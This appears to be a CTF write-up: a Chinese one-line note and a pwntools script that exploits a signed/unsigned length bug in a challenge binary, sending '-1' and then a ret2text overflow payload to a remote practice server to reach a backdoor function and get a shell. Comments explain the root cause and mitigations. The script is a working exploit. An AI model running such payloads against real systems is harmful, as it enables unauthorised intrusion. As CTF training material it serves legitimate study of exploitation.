exp

简单的 ret2text。注意 unsigned int 为 -1 时可以视为无穷。

from pwn import *
from LibcSearcher import *
# Session configuration: 64-bit Linux target, verbose pwntools logging, and
# the terminal command used if a debugger window is spawned from debug().
context.update(
    terminal=["wt.exe", "wsl"],
    os="linux",
    arch="amd64",
    # arch="i386",
    log_level="debug",
)

# Static view of the challenge binary (symbols, sections, addresses).
elf = ELF("./pwn")

# Local process / libc variants are kept for reference only; this script
# talks to the remote instance.
# io = process("./pwn")
# libc = ELF("")
io = remote("node4.buuoj.cn", 26003)
def debug():
    """Attach gdb to the live ``io`` tube with a breakpoint at 0x4007c0, then wait.

    Uses the module-level ``io`` session. ``pause()`` blocks the script so
    the breakpoint can be inspected before any input is sent.
    """
    gdbscript = "b *0x4007c0"
    gdb.attach(io, gdbscript)
    pause()
#code here
# Uncomment to break at 0x4007c0 before any input is sent.
#debug()
# Address inside the binary's own text segment that execution is redirected
# to (ret2text).  A hard-coded address only works because the binary is
# presumably loaded at a fixed base (no PIE) — confirm against the ELF
# headers.  NOTE(review): that this function is a "backdoor" is taken from
# the variable name; verify in the disassembly.
backdoor_addr = 0x4006E6
# Number of filler bytes before the saved registers — presumably the distance
# from the start of the name buffer to the saved rbp; verify with the
# breakpoint above if the stack layout changes.
offset = 16
# Payload layout: <offset> filler bytes, eight zero bytes (taken to land on
# the saved rbp), then the eight-byte target that is meant to replace the
# return address.
payload = cyclic(offset)+p64(0x0)+p64(backdoor_addr)
# Root cause (see the note above the script): the length "-1" is parsed as a
# signed number but used as an unsigned size, so the bound on the following
# read is effectively unlimited.  Validating the length as signed and
# rejecting negative values before the read would remove the overflow; a
# stack canary or PIE would also defeat this fixed-layout, fixed-address
# payload.
io.sendlineafter('Please input the length of your name:','-1')
# The over-long "name" that carries the payload.
io.sendline(payload)
# Hand the session over to the user.
io.interactive()